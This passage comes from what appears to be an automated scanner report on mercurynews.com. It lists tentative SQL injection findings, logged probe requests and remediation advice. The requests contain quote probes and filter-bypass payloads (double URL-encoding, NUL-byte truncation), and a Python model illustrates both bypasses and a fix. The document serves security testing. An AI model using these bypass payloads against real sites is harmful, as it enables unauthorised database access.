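The last payload shows what the quote buys an attacker once the literal can be closed: with concatenation the WHERE clause becomes always-true and every row comes back, with the bound parameter the same text simply matches nothing.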
Request 1
GET /ci_16794599?source=most_emailed' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Docent-led tours would be first, then full access for the public to drive to the top by 201 ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16794599?source=most_emailed'' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Docent-led tours would be first, then full access for the public to drive to the top by 201 ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16794599?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Docent-led tours would be first, then full access for the public to drive to the top by 201 ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16794599?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Docent-led tours would be first, then full access for the public to drive to the top by 201 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16797127?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='It was billed as "An Evening with Leonard Cohen." And thats exactly what it was on Mon ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16797127?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797127?source=m ...[SNIP]...
1.193. http://www.mercurynews.com/ci_16797127 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.mercurynews.com
Path: /ci_16797127
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16797127?1%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='It was billed as "An Evening with Leonard Cohen." And thats exactly what it was on Mon ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16797127?1%2527%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797127?1%2527%2 ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_cc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16797127?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%2527; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='It was billed as "An Evening with Leonard Cohen." And thats exactly what it was on Mon ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16797127?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%2527%2527; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797127?source=m ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16797755 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Death is citys 10th homicide of the year and second in as many days'><meta name="keywo ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]... <span style="font-family:arial;font-size:00.8em;color:#1F2058;"> If map fails to load please refresh your browser or click on the link below. <iframe width="280" height="250" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?hl ...[SNIP]...
Request 2
GET /ci_16797755 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797755?nclick_c ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /ci_16797755?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Death is citys 10th homicide of the year and second in as many days'><meta name="keywo ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]... <span style="font-family:arial;font-size:00.8em;color:#1F2058;"> If map fails to load please refresh your browser or click on the link below. <iframe width="280" height="250" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?hl ...[SNIP]...
Request 2
GET /ci_16797755?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797755?source=m ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the filter stops inspecting the value at the %00, sees only mngimercurynews, and lets the request through, while the application behind it reads the full length of the value and so receives the quote that follows the NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
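How the two bypasses reported in this section (double URL-encoding, covered by the remediation detail for the u, UserID, s_cc and Referer findings above, and the NULL byte, covered by the remediation detail directly above) get past a filter that inspects input before the application has finished decoding it, and the ordering those remediation details ask for, as an added Python model. This is not the scanned site's code and not a model of any particular WAF product: platform_decode stands for the single URL-decode the server performs, native_filter_blocks for a filter that stops at a NUL byte the way C string functions do, app_double_decode for an application that needlessly decodes a second time, and validate_after_canonicalisation for a check that runs over the same string the query would use. Function names and sample values are assumptions for illustration; the primary fix remains the parameterised query described in the remediation background, with this check as a secondary control.

```python
from urllib.parse import unquote


def platform_decode(raw):
    # The single URL-decode the web server or container performs before any
    # filter or application code sees the value.
    return unquote(raw)


def native_filter_blocks(value):
    # Model of a filter written in native code: it handles the value as a
    # C string, so inspection stops at the first NUL byte. It blocks on a
    # single quote. (Modelled behaviour, not any specific product.)
    visible = value.split("\x00", 1)[0]
    return "'" in visible


def app_double_decode(value):
    # Application that URL-decodes the already-decoded value a second time.
    return unquote(value)


def app_single_decode(value):
    # Application that uses the value exactly as the platform delivered it.
    return value


def reaches_app(raw, app_decode):
    # Run one raw value through decode -> filter -> application and report
    # (blocked_by_filter, value_the_query_would_see).
    value = platform_decode(raw)
    if native_filter_blocks(value):
        return True, None
    return False, app_decode(value)


def validate_after_canonicalisation(raw):
    # The ordering the remediation asks for: canonicalise exactly once, then
    # validate the very string that will be used. A NUL byte is never a legal
    # part of these values, so it is rejected rather than silently cut off.
    value = platform_decode(raw)
    if "\x00" in value:
        return "rejected: NUL byte"
    if "'" in value:
        return "rejected: quote"
    return value


if __name__ == "__main__":
    # Constructed inputs mirroring the shapes used in the requests above.
    print("%2527 with double-decoding app:", reaches_app("%2527", app_double_decode))
    print("%2527 with single-decoding app:", reaches_app("%2527", app_single_decode))
    print("%27 (plain quote):", reaches_app("%27", app_double_decode))
    print("NUL then quote:", reaches_app("mngimercurynews%00'", app_single_decode))
    print("hardened:", validate_after_canonicalisation("mngimercurynews%00'"))
```

With %2527 the filter sees %27, which contains no quote, and only the application's second decode turns it into a quote; removing that second decode leaves the value as the harmless text %27. With mngimercurynews%00' the filter sees only mngimercurynews, yet the application, reading the full value, gets the quote; a check that runs over the canonical value in the application itself catches both.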
Request 1
GET /ci_16797755?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Death is citys 10th homicide of the year and second in as many days'><meta name="keywo ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]... <span style="font-family:arial;font-size:00.8em;color:#1F2058;"> If map fails to load please refresh your browser or click on the link below. <iframe width="280" height="250" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?hl ...[SNIP]...
Request 2
GET /ci_16797755?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797755?source=m ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
